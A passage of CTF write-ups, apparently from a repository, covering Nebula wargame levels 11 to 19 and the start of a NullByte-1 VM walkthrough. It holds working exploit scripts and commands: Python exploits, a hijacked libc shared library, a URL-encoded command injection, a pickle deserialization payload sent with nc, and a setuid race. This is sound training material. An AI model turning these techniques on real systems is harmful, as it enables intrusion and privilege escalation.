0) { 77 | errx(1, "invalid header"); 78 | } 79 | 80 | printf("%s",line + strlen(CL)); 81 | 82 | length = atoi(line + strlen(CL)); 83 | 84 | if(length < sizeof(buf)) { 85 | if(fread(buf, length, 1, stdin) != length) { 86 | err(1, "fread length"); 87 | } 88 | process(buf, length); 89 | } else { 90 | int blue = length; 91 | int pink; 92 | 93 | fd = getrand(&path); 94 | 95 | while(blue > 0) { 96 | printf("blue = %d, length = %d, ", blue, length); 97 | 98 | pink = fread(buf, 1, sizeof(buf), stdin); 99 | printf("pink = %d\n", pink); 100 | 101 | if(pink <= 0) { 102 | err(1, "fread fail(blue = %d, length = %d)", blue, length); 103 | } 104 | write(fd, buf, pink); 105 | 106 | blue -= pink; 107 | } 108 | 109 | mem = mmap(NULL, length, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0); 110 | if(mem == MAP_FAILED) { 111 | err(1, "mmap"); 112 | } 113 | process(mem, length); 114 | } 115 | 116 | } 117 | ``` 118 | 119 | 120 | #### Solutions 121 | 122 | Python函数Process实现了C源码中的Process函数的功能, 123 | de_Process函数,用于解密Process函数。 124 | 125 | ``` 126 | def process(buffer_, length): 127 | '''level11 -- function process''' 128 | key = length & 0xff 129 | ret = [] 130 | 131 | for s in buffer_: 132 | _char = ord(s) 133 | _char ^= key 134 | 135 | d = _char & 0xff 136 | d = chr(d) 137 | 138 | key -= _char 139 | 140 | ret.append(d) 141 | 142 | # print "%s --> %s key: %s" % (s, d, key) 143 | 144 | return "".join(ret) 145 | 146 | 147 | def de_process(buffer_, length): 148 | '''level11 -- decode function process''' 149 | key = length & 0xff 150 | ret = [] 151 | 152 | for s in buffer_: 153 | _char = ord(s) 154 | _char ^= key 155 | 156 | d = _char & 0xff 157 | d = chr(d) 158 | 159 | key -= (_char ^ key) 160 | 161 | ret.append(d) 162 | 163 | # print "%s --> %s key: %s" % (s, d, key) 164 | 165 | return "".join(ret) 166 | ``` 167 | 168 | 传入单个字符b,会被转码为c*(*代表其他字符), 169 | 由于缓冲区未被初始化为00,导致转换输出的内容后面包含其他字符.测试如下: 170 | 171 | 172 | ##### 方案一. length < 1024 173 | 174 | ``` 175 | 详见代码: exploit_1 176 | 177 | level11@nebula:/tmp$ export PATH=/tmp:$PATH 178 | level11@nebula:/tmp$ ln -s /bin/getflag /tmp/c 179 | level11@nebula:/tmp$ echo -ne 'Content-Length: 1\nb\00' | /home/flag11/flag11 180 | 0x63 181 | c� 182 | sh: $'c\260\344': command not found 183 | level11@nebula:/tmp$ echo -ne 'Content-Length: 1\nb\00' | /home/flag11/flag11 184 | 0x63 185 | c0 186 | sh: $'c0\304': command not found 187 | level11@nebula:/tmp$ echo -ne 'Content-Length: 1\nb\00' | /home/flag11/flag11 188 | 0x63 189 | c . 190 | getflag is executing on a non-flag account, this doesn't count 191 | 192 | 为了避免上面的问题,使用LD_PRELOAD对内存进行初始化. 193 | 194 | level11@nebula/tmp$: export LD_PRELOAD=`python -c 'print "\x00"*3'` --------> #### 195 | 196 | 系统成功执行命令,但用户身份不对。网上说法: system() 函数调用时,未做相关的权限操作。 197 | level11@nebula:/tmp$ echo -ne 'Content-Length: 1\nb' | /home/flag11/flag11 198 | uid=1012(level11) gid=1012(level11) groups=1012(level11) 199 | ``` 200 | 201 | ##### 方案二. length >= 1024 202 | ``` 203 | 详见代码: exploit_2 204 | 205 | 206 | Recommends 207 | http://uberskill.blogspot.com/2012/09/nebula-level11.html 208 | http://github.com/1u4nx/Exploit-Exercises-Nebula/ 209 | http://v0ids3curity.blogspot.com/2012/12/exploit-exercise-level-11.html 210 | http://hanjc.me/blog/2014/01/26/nebula-level11/ 211 | http://cybergibbons.com/security-2/nebula-walkthrough/nebula-exploit-exercises-walkthrough-level11/ 212 | 213 | http://stackoverflow.com/questions/16258830/does-system-syscall-drop-privileges 214 | 215 | 216 | Exploits 217 | 218 | 攻击代码如下: 219 | #!/usr/bin/env python 220 | # -*- encoding: utf-8 -*- 221 | 222 | import os 223 | 224 | ''' 225 | void process(char *buffer, int length) 226 | { 227 | unsigned int key; 228 | int i; 229 | key = length & 0xff; 230 | 231 | for(i = 0; i < length; i++) { 232 | buffer[i] ^= key; 233 | key -= buffer[i]; 234 | } 235 | system(buffer); 236 | } 237 | 238 | ''' 239 | 240 | 241 | def process(buffer_, length): 242 | '''level11 -- function process''' 243 | key = length & 0xff 244 | ret = [] 245 | 246 | for s in buffer_: 247 | _char = ord(s) 248 | _char ^= key 249 | 250 | d = _char & 0xff 251 | d = chr(d) 252 | 253 | key -= _char 254 | 255 | ret.append(d) 256 | 257 | # print "%s --> %s key: %s" % (s, d, key) 258 | 259 | return "".join(ret) 260 | 261 | 262 | def de_process(buffer_, length): 263 | '''level11 -- decode function process''' 264 | key = length & 0xff 265 | ret = [] 266 | 267 | for s in buffer_: 268 | _char = ord(s) 269 | _char ^= key 270 | 271 | d = _char & 0xff 272 | d = chr(d) 273 | 274 | key -= (_char ^ key) 275 | 276 | ret.append(d) 277 | 278 | # print "%s --> %s key: %s" % (s, d, key) 279 | 280 | return "".join(ret) 281 | 282 | 283 | def exploit_1(cmd): 284 | '''input < 1024''' 285 | # cmd = "/usr/bin/id" 286 | _input = 's' 287 | 288 | length = len(_input) 289 | ret = process(_input, length) 290 | 291 | cmds = ['cd /tmp;', 292 | 'rm -f /tmp/%s;' % _input, 293 | 'ln -s %s /tmp/%s;' % (cmd, _input), 294 | 'export PATH=/tmp:$PATH;', 295 | 'export LD_PRELOAD=%s;' % ("\xFF" * (length + 1))] 296 | 297 | [os.system(c) for c in cmds] 298 | 299 | payload = "Content-Length: %d\n%s\00" % (length, ret) 300 | 301 | print payload 302 | return payload 303 | 304 | 305 | def exploit_2(cmd): 306 | '''input >= 1024''' 307 | _i = 's' + '\00' * 1023 308 | length = len(_i) 309 | ret = process(_i, length) 310 | 311 | cmds = ['export TEMP=/tmp;', 312 | 'export LD_PRELOAD=%s' % (length)] 313 | 314 | [os.system(c) for c in cmds] 315 | 316 | payload = "Content-Length: %d\n%s\00" % (length, ret) 317 | print payload 318 | 319 | 320 | if __name__ == "__main__": 321 | exploit_1("/usr/bin/id") 322 | # exploit_2("/usr/bin/id") 323 | ``` 324 | -------------------------------------------------------------------------------- /CTFS/Nebula/level12.md: -------------------------------------------------------------------------------- 1 | # Level12 2 | 3 | #### About 4 | 5 | There is a backdoor process listening on port 50001. 6 | To do this level, log in as the level12 account with the password level12. Files for this level can be found in /home/flag12. 7 | 8 | 9 | #### Source Code 10 | 11 | ``` 12 | local socket = require("socket") 13 | local server = assert(socket.bind("127.0.0.1", 50001)) 14 | 15 | function hash(password) 16 | prog = io.popen("echo "..password.." | sha1sum", "r") 17 | data = prog:read("*all") 18 | prog:close() 19 | 20 | data = string.sub(data, 1, 40) 21 | 22 | return data 23 | end 24 | 25 | 26 | while 1 do 27 | local client = server:accept() 28 | client:send("Password: ") 29 | client:settimeout(60) 30 | local line, err = client:receive() 31 | if not err then 32 | print("trying " .. line) -- log from where ;\ 33 | local h = hash(line) 34 | 35 | if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then 36 | client:send("Better luck next time\n"); 37 | else 38 | client:send("Congrats, your token is 413**CARRIER LOST**\n") 39 | end 40 | 41 | end 42 | 43 | client:close() 44 | end 45 | ``` 46 | 47 | 48 | #### Solutions 49 | 50 | ``` 51 | nc -v 127.0.0.1 50001 52 | test | /bin/getflag | tee /tmp/level12.txt 53 | cat /tmp/level12.txt 54 | ``` 55 | 56 | #### Exploits 57 | 58 | ``` 59 | #!/usr/bin/env python 60 | 61 | import socket 62 | 63 | def exploit(host, port): 64 | tmpfile = "/tmp/7845.yxha" 65 | payload = "xxx | /bin/getflag > %s \n" % tmpfile 66 | c = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) 67 | 68 | addr = (host, port) 69 | c.connect(addr) 70 | 71 | data = c.recv(1024) 72 | 73 | if 'Password' in data: 74 | print "[+] exploit %s\n%s" % (addr, payload) 75 | c.sendall(payload) 76 | # data = c.recv(1024) 77 | 78 | # print data 79 | 80 | c.close() 81 | 82 | 83 | def main(): 84 | exploit('127.0.0.1', 50001) 85 | 86 | if __name__ == "__main__": 87 | main() 88 | ``` 89 | -------------------------------------------------------------------------------- /CTFS/Nebula/level13.md: -------------------------------------------------------------------------------- 1 | # Level13 2 | 3 | #### About 4 | 5 | There is a security check that prevents the program from continuing execution if the user invoking it does not match a specific user id. 6 | To do this level, log in as the level13 account with the password level13. Files for this level can be found in /home/flag13. 7 | 8 | 9 | #### Source code 10 | 11 | ``` 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | #define FAKEUID 1000 19 | 20 | int main(int argc, char **argv, char **envp) 21 | { 22 | int c; 23 | char token[256]; 24 | 25 | if(getuid() != FAKEUID) { 26 | printf("Security failure detected. UID %d started us, we expect %d\n", getuid(), FAKEUID); 27 | printf("The system administrators will be notified of this violation\n"); 28 | exit(EXIT_FAILURE); 29 | } 30 | 31 | // snip, sorry :) 32 | 33 | printf("your token is %s\n", token); 34 | 35 | } 36 | ``` 37 | 38 | #### Solutions 39 | 40 | * gdb flag13 41 | ``` 42 | (gdb) disassemble main 43 | break *0x080484f4 44 | run 45 | print $eax 46 | set $eax=1000 47 | print $eax 48 | continue 49 | ``` 50 | 51 | * su flag13 < b705702b-76a8-42b0-8844-3adabbe5ac58 52 | 53 | 54 | #### Recommends 55 | 56 | http://www.yolinux.com/TUTORIALS/GDB-Commands.html 57 | objdump 58 | -------------------------------------------------------------------------------- /CTFS/Nebula/level14.md: -------------------------------------------------------------------------------- 1 | # Level14 2 | 3 | #### About 4 | 5 | This program resides in /home/flag14/flag14. It encrypts input and writes it to standard output. An encrypted token file is also in that home directory, decrypt it :) 6 | To do this level, log in as the level14 account with the password level14. Files for this level can be found in /home/flag14. 7 | 8 | 9 | #### Source code 10 | 11 | There is no source code available for this level 12 | 13 | #### Solutions 14 | ``` 15 | 11111111111111111111111111111111111111111111111 16 | 123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^` 17 | 18 | 19 | Output: 8457c118-887c-4e40-a5a6-33a25353165 20 | su flag14 < 8457c118-887c-4e40-a5a6-33a25353165 21 | /bin/getflag 22 | ``` 23 | 24 | #### Exploits 25 | 26 | ``` 27 | #!/usr/bin/env python 28 | # -*- encoding: utf-8 -*- 29 | 30 | def main(): 31 | with open('/home/flag14/token', 'r') as f: 32 | keys = [] 33 | data = f.read().strip() 34 | for i, j in enumerate(data): 35 | key = chr(ord(j) - i) 36 | keys.append(key) 37 | 38 | pwd = "".join(keys) 39 | return pwd 40 | 41 | 42 | if __name__ == "__main__": 43 | main() 44 | ``` 45 | 46 | #### Recommends 47 | 48 | How to run command as a different user ? 49 | 50 | http://www.cyberciti.biz/open-source/command-line-hacks/linux-run-command-as-different-user/ 51 | http://stackoverflow.com/questions/233217/pass-password-to-su-sudo-ssh 52 | http://www.experts-exchange.com/Programming/Languages/Scripting/Python/Q_23048208.html 53 | -------------------------------------------------------------------------------- /CTFS/Nebula/level15.md: -------------------------------------------------------------------------------- 1 | # Level15 2 | 3 | #### About 4 | 5 | strace the binary at /home/flag15/flag15 and see if you spot anything out of the ordinary. 6 | You may wish to review how to “compile a shared library in linux” and how the libraries are loaded and processed by reviewing the dlopen manpage in depth. 7 | Clean up after yourself :) 8 | 9 | To do this level, log in as the level15 account with the password level15. Files for this level can be found in /home/flag15. 10 | 11 | 12 | #### Source code 13 | 14 | There is no source code available for this level 15 | 16 | 17 | #### Soltions 18 | 19 | ``` 20 | level15@nebula:~$ objdump -p /home/flag15/flag15 21 | 22 | /home/flag15/flag15: file format elf32-i386 23 | 24 | Program Header: 25 | PHDR off 0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2 26 | filesz 0x00000120 memsz 0x00000120 flags r-x 27 | INTERP off 0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0 28 | filesz 0x00000013 memsz 0x00000013 flags r-- 29 | LOAD off 0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12 30 | filesz 0x000005d4 memsz 0x000005d4 flags r-x 31 | LOAD off 0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**12 32 | filesz 0x00000108 memsz 0x00000110 flags rw- 33 | DYNAMIC off 0x00000f20 vaddr 0x08049f20 paddr 0x08049f20 align 2**2 34 | filesz 0x000000d0 memsz 0x000000d0 flags rw- 35 | NOTE off 0x00000168 vaddr 0x08048168 paddr 0x08048168 align 2**2 36 | filesz 0x00000044 memsz 0x00000044 flags r-- 37 | EH_FRAME off 0x000004dc vaddr 0x080484dc paddr 0x080484dc align 2**2 38 | filesz 0x00000034 memsz 0x00000034 flags r-- 39 | STACK off 0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2 40 | filesz 0x00000000 memsz 0x00000000 flags rw- 41 | RELRO off 0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**0 42 | filesz 0x000000f4 memsz 0x000000f4 flags r-- 43 | 44 | Dynamic Section: 45 | NEEDED libc.so.6 46 | RPATH /var/tmp/flag15 47 | INIT 0x080482c0 48 | FINI 0x080484ac 49 | GNU_HASH 0x080481ac 50 | STRTAB 0x0804821c 51 | SYMTAB 0x080481cc 52 | STRSZ 0x0000005a 53 | SYMENT 0x00000010 54 | DEBUG 0x00000000 55 | PLTGOT 0x08049ff4 56 | PLTRELSZ 0x00000018 57 | PLTREL 0x00000011 58 | JMPREL 0x080482a8 59 | REL 0x080482a0 60 | RELSZ 0x00000008 61 | RELENT 0x00000008 62 | VERNEED 0x08048280 63 | VERNEEDNUM 0x00000001 64 | VERSYM 0x08048276 65 | 66 | Version References: 67 | required from libc.so.6: 68 | 0x0d696910 0x00 02 GLIBC_2.0 69 | 70 | level15@nebula:/var/tmp/flag15$ cat exploit.c 71 | #include 72 | int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) { 73 | execl("/bin/getflag", (char *)NULL, (char *)NULL); 74 | } 75 | level15@nebula:/var/tmp/flag15$ gcc -fPIC -g -c exploit.c 76 | level15@nebula:/var/tmp/flag15$ ls -l 77 | total 8 78 | -rw-rw-r-- 1 level15 level15 255 2014-11-22 08:11 exploit.c 79 | -rw-rw-r-- 1 level15 level15 2956 2014-11-22 08:11 exploit.o 80 | level15@nebula:/var/tmp/flag15$ gcc exploit.o -shared -o libc.so.6 81 | level15@nebula:/var/tmp/flag15$ /home/flag15/flag15 82 | /home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15) 83 | /home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6) 84 | /home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6) 85 | /home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference 86 | level15@nebula:/var/tmp/flag15$ gcc -fPIC -g -c exploit.c 87 | level15@nebula:/var/tmp/flag15$ gcc -shared -Wl,--version-script,verscript -o libc.so.6 exploit.o 88 | level15@nebula:/var/tmp/flag15$ /home/flag15/flag15 89 | /home/flag15/flag15: /var/tmp/flag15/libc.so.6: version `GLIBC_2.1.3' not found (required by /var/tmp/flag15/libc.so.6) 90 | level15@nebula:/var/tmp/flag15$ gcc -shared -Wl,--version-script,verscript,-Bstatic -static-libgcc -o libc.so.6 exploit.o 91 | level15@nebula:/var/tmp/flag15$ /home/flag15/flag15 92 | You have successfully executed getflag on a target account 93 | 94 | level15@nebula:/var/tmp/flag15$ cat exploit.c 95 | #include 96 | int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) { 97 | // execl("/bin/getflag", (char *)NULL, (char *)NULL); 98 | system("/bin/getflag"); 99 | } 100 | 101 | level15@nebula:/var/tmp/flag15$ gcc -fPIC -g -c exploit.c 102 | level15@nebula:/var/tmp/flag15$ gcc -shared -Wl,--version-script,verscript,-Bstatic -static-libgcc -o libc.so.6 exploit.o 103 | level15@nebula:/var/tmp/flag15$ /home/flag15/flag15 104 | You have successfully executed getflag on a target account 105 | Segmentation fault ++++++++ Attention Here !!! 106 | ``` 107 | 108 | #### Recommend 109 | 110 | http://www.kroosec.com/2012/11/nebula-level15.html 111 | http://www.yolinux.com/TUTORIALS/LibraryArchives-StaticAndDynamic.html 112 | -------------------------------------------------------------------------------- /CTFS/Nebula/level16.md: -------------------------------------------------------------------------------- 1 | # Level16 2 | 3 | #### About 4 | 5 | There is a perl script running on port 1616. 6 | To do this level, log in as the level16 account with the password level16. Files for this level can be found in /home/flag16. 7 | 8 | 9 | #### Source code 10 | 11 | ``` 12 | #!/usr/bin/env perl 13 | 14 | use CGI qw{param}; 15 | 16 | print "Content-type: text/html\n\n"; 17 | 18 | sub login { 19 | $username = $_[0]; 20 | $password = $_[1]; 21 | 22 | $username =~ tr/a-z/A-Z/; # conver to uppercase 23 | $username =~ s/\s.*//; # strip everything after a space 24 | 25 | @output = `egrep "^$username" /home/flag16/userdb.txt 2>&1`; 26 | foreach $line (@output) { 27 | ($usr, $pw) = split(/:/, $line); 28 | 29 | 30 | if($pw =~ $password) { 31 | return 1; 32 | } 33 | } 34 | 35 | return 0; 36 | } 37 | 38 | sub htmlz { 39 | print("Login resuls"); 40 | if($_[0] == 1) { 41 | print("Your login was accepted
"); 42 | } else { 43 | print("Your login failed
"); 44 | } 45 | print("Would you like a cookie?

\n"); 46 | } 47 | 48 | htmlz(login(param("username"), param("password"))); 49 | ``` 50 | 51 | #### Solutions 52 | 53 | ``` 54 | echo ${PWD,,} 55 | 56 | level16@nebula:~$ ${/BIN/GETFLAG>/TMP/11.TXT,,} 57 | -sh: ${/BIN/GETFLAG>/TMP/11.TXT,,}: bad substitution 58 | level16@nebula:~$ CMD=/BIN/GETFLAG;${CMD,,} 59 | getflag is executing on a non-flag account, this doesn't count 60 | 61 | level16@nebula:~$ cat /tmp/exp.sh 62 | #!/bin/bash 63 | 64 | /bin/getflag>>/tmp/lv16.txt 65 | level16@nebula:~$ wget http://localhost:1616/index.cgi?username=%22%3C%2FDEV%2FNULL%3BP%3D%2FTMP%2FEXP.SH%3B%24{P%2C%2C}%3B%23&password= 66 | ``` 67 | -------------------------------------------------------------------------------- /CTFS/Nebula/level17.md: -------------------------------------------------------------------------------- 1 | # Level17 2 | 3 | #### About 4 | 5 | There is a python script listening on port 10007 that contains a vulnerability. 6 | To do this level, log in as the level17 account with the password level17. Files for this level can be found in /home/flag17. 7 | 8 | 9 | #### Source code 10 | 11 | ``` 12 | #!/usr/bin/python 13 | 14 | import os 15 | import pickle 16 | import time 17 | import socket 18 | import signal 19 | 20 | signal.signal(signal.SIGCHLD, signal.SIG_IGN) 21 | 22 | def server(skt): 23 | line = skt.recv(1024) 24 | 25 | obj = pickle.loads(line) 26 | 27 | for i in obj: 28 | clnt.send("why did you send me " + i + "?\n") 29 | 30 | skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) 31 | skt.bind(('0.0.0.0', 10007)) 32 | skt.listen(10) 33 | 34 | while True: 35 | clnt, addr = skt.accept() 36 | 37 | if(os.fork() == 0): 38 | clnt.send("Accepted connection from %s:%d" % (addr[0], addr[1])) 39 | server(clnt) 40 | exit(1) 41 | ``` 42 | 43 | #### Soltions 44 | 45 | ``` 46 | level17@nebula:~$ cat /tmp/lv17.txt 47 | cos 48 | system 49 | (S'getflag > /tmp/pwnie17' 50 | tR. 51 | level17@nebula:~$ nc 192.168.1.106 10007 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | struct { 22 | FILE *debugfile; 23 | int verbose; 24 | int loggedin; 25 | } globals; 26 | 27 | #define dprintf(...) if(globals.debugfile) \ 28 | fprintf(globals.debugfile, __VA_ARGS__) 29 | #define dvprintf(num, ...) if(globals.debugfile && globals.verbose >= num) \ 30 | fprintf(globals.debugfile, __VA_ARGS__) 31 | 32 | #define PWFILE "/home/flag18/password" 33 | 34 | void login(char *pw) 35 | { 36 | FILE *fp; 37 | 38 | fp = fopen(PWFILE, "r"); 39 | if(fp) { 40 | char file[64]; 41 | 42 | if(fgets(file, sizeof(file) - 1, fp) == NULL) { 43 | dprintf("Unable to read password file %s\n", PWFILE); 44 | return; 45 | } 46 | fclose(fp); 47 | if(strcmp(pw, file) != 0) return; 48 | } 49 | dprintf("logged in successfully (with%s password file)\n", 50 | fp == NULL ? "out" : ""); 51 | 52 | globals.loggedin = 1; 53 | 54 | } 55 | 56 | void notsupported(char *what) 57 | { 58 | char *buffer = NULL; 59 | asprintf(&buffer, "--> [%s] is unsupported at this current time.\n", what); 60 | dprintf(what); 61 | free(buffer); 62 | } 63 | 64 | void setuser(char *user) 65 | { 66 | char msg[128]; 67 | 68 | sprintf(msg, "unable to set user to '%s' -- not supported.\n", user); 69 | printf("%s\n", msg); 70 | 71 | } 72 | 73 | int main(int argc, char **argv, char **envp) 74 | { 75 | char c; 76 | 77 | while((c = getopt(argc, argv, "d:v")) != -1) { 78 | switch(c) { 79 | case 'd': 80 | globals.debugfile = fopen(optarg, "w+"); 81 | if(globals.debugfile == NULL) err(1, "Unable to open %s", optarg); 82 | setvbuf(globals.debugfile, NULL, _IONBF, 0); 83 | break; 84 | case 'v': 85 | globals.verbose++; 86 | break; 87 | } 88 | } 89 | 90 | dprintf("Starting up. Verbose level = %d\n", globals.verbose); 91 | 92 | setresgid(getegid(), getegid(), getegid()); 93 | setresuid(geteuid(), geteuid(), geteuid()); 94 | 95 | while(1) { 96 | char line[256]; 97 | char *p, *q; 98 | 99 | q = fgets(line, sizeof(line)-1, stdin); 100 | if(q == NULL) break; 101 | p = strchr(line, '\n'); if(p) *p = 0; 102 | p = strchr(line, '\r'); if(p) *p = 0; 103 | 104 | dvprintf(2, "got [%s] as input\n", line); 105 | 106 | if(strncmp(line, "login", 5) == 0) { 107 | dvprintf(3, "attempting to login\n"); 108 | login(line + 6); 109 | } else if(strncmp(line, "logout", 6) == 0) { 110 | globals.loggedin = 0; 111 | } else if(strncmp(line, "shell", 5) == 0) { 112 | dvprintf(3, "attempting to start shell\n"); 113 | if(globals.loggedin) { 114 | execve("/bin/sh", argv, envp); 115 | err(1, "unable to execve"); 116 | } 117 | dprintf("Permission denied\n"); 118 | } else if(strncmp(line, "logout", 4) == 0) { 119 | globals.loggedin = 0; 120 | } else if(strncmp(line, "closelog", 8) == 0) { 121 | if(globals.debugfile) fclose(globals.debugfile); 122 | globals.debugfile = NULL; 123 | } else if(strncmp(line, "site exec", 9) == 0) { 124 | notsupported(line + 10); 125 | } else if(strncmp(line, "setuser", 7) == 0) { 126 | setuser(line + 8); 127 | } 128 | } 129 | 130 | return 0; 131 | } 132 | 133 | ``` 134 | 135 | -------------------------------------------------------------------------------- /CTFS/Nebula/level19.md: -------------------------------------------------------------------------------- 1 | # Level19 2 | 3 | #### About 4 | 5 | There is a flaw in the below program in how it operates. 6 | To do this level, log in as the level19 account with the password level19. Files for this level can be found in /home/flag19. 7 | 8 | 9 | #### Source code 10 | 11 | ``` 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | int main(int argc, char **argv, char **envp) 21 | { 22 | pid_t pid; 23 | char buf[256]; 24 | struct stat statbuf; 25 | 26 | /* Get the parent's /proc entry, so we can verify its user id */ 27 | 28 | snprintf(buf, sizeof(buf)-1, "/proc/%d", getppid()); 29 | 30 | /* stat() it */ 31 | 32 | if(stat(buf, &statbuf) == -1) { 33 | printf("Unable to check parent process\n"); 34 | exit(EXIT_FAILURE); 35 | } 36 | 37 | /* check the owner id */ 38 | 39 | if(statbuf.st_uid == 0) { 40 | /* If root started us, it is ok to start the shell */ 41 | 42 | execve("/bin/sh", argv, envp); 43 | err(1, "Unable to execve"); 44 | } 45 | 46 | printf("You are unauthorized to run this program\n"); 47 | } 48 | ``` 49 | 50 | #### Solutions 51 | 52 | ``` 53 | #include 54 | #include 55 | #include 56 | #include 57 | #include 58 | 59 | int main(void){ 60 | pid_t pid; 61 | char* args[]= {"/bin/sh", "-c", "getflag > /tmp/flag19", NULL}; 62 | pid = fork(); 63 | if (pid==0){ 64 | nice(19); 65 | execve("/home/flag19/flag19",args, NULL); 66 | }else if (pid <0){ 67 | printf("Ups\n"); 68 | }else{ 69 | exit(1); 70 | } 71 | return 0; 72 | } 73 | ``` 74 | 75 | #### Recommands 76 | 77 | http://securityetalii.es/2012/08/10/soluciones-nebula-niveles-1719/ 78 | 79 | -------------------------------------------------------------------------------- /CTFS/NullByte/NullByte-1.md: -------------------------------------------------------------------------------- 1 | #NullByte-1 Workthrough# 2 | 3 | Scan internal network for target ip address. Finally, we find nullbyte ip address - 192.168.10.32. 4 | 5 | ## Scan Open Ports ## 6 | 7 | ``` 8 | ┌─[lab@core]─[/tmp] 9 | └──╼ nmap -v -n -A -p- 192.168.10.32 10 | 11 | Starting Nmap 6.47 ( http://nmap.org ) at 2015-08-28 04:32 UTC 12 | NSE: Loaded 118 scripts for scanning. 13 | NSE: Script Pre-scanning. 14 | Initiating Ping Scan at 04:32 15 | Scanning 192.168.10.32 [2 ports] 16 | Completed Ping Scan at 04:32, 0.00s elapsed (1 total hosts) 17 | Initiating Connect Scan at 04:32 18 | Scanning 192.168.10.32 [65535 ports] 19 | Discovered open port 80/tcp on 192.168.10.32 20 | Discovered open port 111/tcp on 192.168.10.32 21 | Discovered open port 42151/tcp on 192.168.10.32 22 | Discovered open port 777/tcp on 192.168.10.32 23 | Completed Connect Scan at 04:32, 4.18s elapsed (65535 total ports) 24 | Initiating Service scan at 04:32 25 | Scanning 4 services on 192.168.10.32 26 | Completed Service scan at 04:32, 11.01s elapsed (4 services on 1 host) 27 | NSE: Script scanning 192.168.10.32. 28 | Initiating NSE at 04:32 29 | Completed NSE at 04:32, 0.17s elapsed 30 | Nmap scan report for 192.168.10.32 31 | Host is up (0.016s latency). 32 | Not shown: 65531 closed ports 33 | PORT STATE SERVICE VERSION 34 | 80/tcp open http Apache httpd 2.4.10 ((Debian)) 35 | |_http-methods: GET HEAD POST OPTIONS 36 | |_http-title: Null Byte 00 - level 1 37 | 111/tcp open rpcbind 2-4 (RPC #100000) 38 | | rpcinfo: 39 | | program version port/proto service 40 | | 100000 2,3,4 111/tcp rpcbind 41 | | 100000 2,3,4 111/udp rpcbind 42 | | 100024 1 42151/tcp status 43 | |_ 100024 1 60595/udp status 44 | 777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) 45 | |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) 46 | 42151/tcp open status 1 (RPC #100024) 47 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 48 | 49 | NSE: Script Post-scanning. 50 | Read data files from: /usr/bin/../share/nmap 51 | Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 52 | Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds 53 | 54 | ``` 55 | 56 | ## Vuln Analysis ## 57 | 58 | ``` 59 | | Port | Ptotocol | Description | 60 | |:-------|:-----------|:---------------------------------------| 61 | | 80 | tcp | Apache httpd 2.4.10 (Debian) | 62 | | 111 | tcp | rpcbind | 63 | | 777 | tcp | OpenSSH 6.7p1 Debian 5 (protocol 2.0) | 64 | | 42151 | tcp | Status | 65 | ``` 66 | 67 | ### HTTP ### 68 | 69 | Access http://192.168.10.32:80/, we can view a picture and a message. "If you search for the laws of harmony, you will find knowledge." 70 | 71 | 1. **Scan web directory** 72 | 73 | ``` 74 | ┌─[lab@core]─[/tmp] 75 | └──╼ python wfuzz.py -c -z file,/opt/fuzzdb/discovery/web-dir-list.txt --hc 404 http://192.168.10.32/FUZZ/ 76 | ******************************************************** 77 | * Wfuzz 2.1.3 - The Web Bruteforcer * 78 | ******************************************************** 79 | 80 | Target: http://192.168.10.32/FUZZ/ 81 | Total requests: 3932 82 | 83 | ================================================================== 84 | ID Response Lines Word Chars Request 85 | ================================================================== 86 | 87 | 01576: C=403 11 L 32 W 298 Ch ".htaccess" 88 | 01689: C=403 11 L 32 W 294 Ch "icons" 89 | 01775: C=403 11 L 32 W 299 Ch "javascript" 90 | 02526: C=200 24 L 324 W 9115 Ch "phpmyadmin" 91 | 02747: C=403 11 L 32 W 298 Ch ".htpasswd" 92 | 02922: C=403 11 L 32 W 302 Ch "server-status" 93 | 03496: C=200 6 L 11 W 113 Ch "uploads" 94 | 95 | Total time: 9.983371 96 | Processed Requests: 3932 97 | Filtered Requests: 3925 98 | Requests/sec.: 393.8549 99 | 100 | ``` 101 | 102 | try to access [phpmyadmin](http://192.168.10.32/phpmyadmin/) and [uploads](http://192.168.10.32/uploads/). Brute forece phpmyadmin with patator, but no result. 103 | 104 | 105 | 2. **Analysis Picture** 106 | 107 | We need more, and download http://192.168.10.32/main.gif. Analysis it with exiftool, we can see: 108 | 109 | ``` 110 | ┌─[lab@core]─[/tmp] 111 | └──╼ exiftool main.gif 112 | ExifTool Version Number : 10.00 113 | File Name : main.gif 114 | Directory : . 115 | File Size : 16 kB 116 | File Modification Date/Time : 2015:08:27 14:48:11+00:00 117 | File Access Date/Time : 2015:08:28 04:48:12+00:00 118 | File Inode Change Date/Time : 2015:08:28 04:48:12+00:00 119 | File Permissions : rw-r--r-- 120 | File Type : GIF 121 | File Type Extension : gif 122 | MIME Type : image/gif 123 | GIF Version : 89a 124 | Image Width : 235 125 | Image Height : 302 126 | Has Color Map : No 127 | Color Resolution Depth : 8 128 | Bits Per Pixel : 1 129 